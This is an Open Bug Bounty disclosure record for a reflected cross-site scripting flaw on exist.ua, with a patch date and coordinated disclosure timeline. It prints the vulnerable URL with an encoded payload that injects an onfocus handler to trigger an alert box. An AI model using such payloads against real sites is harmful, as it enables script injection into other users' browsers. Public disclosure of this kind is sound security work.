exist.ua XSS vulnerability

2015-08-16T23:27:00
ID OBB:79653
Type openbugbounty
Reporter wwwebaudit
Modified 2016-01-30T22:06:00

Description

Vulnerable URL:
http://exist.ua/price.aspx?pcode=%27%20type%3Dtext%20autofocus%20onfocus%3Dalert%28%2fxssposed%2f%29%20s%3D%27a
Details:

Description| Value
---|---
Patched:| Yes, at 30.01.2016
Latest check for patch:| 30.01.2016 22:06 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 27321
Google Pagerank| 4
VIP website status:| Yes
Check exist.ua SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 16 August, 2015 23:27 GMT
Vulnerability existence verified and confirmed| 16 August, 2015 23:30 GMT
Vulnerability patched by the website owner| 30 January, 2016 22:06 GMT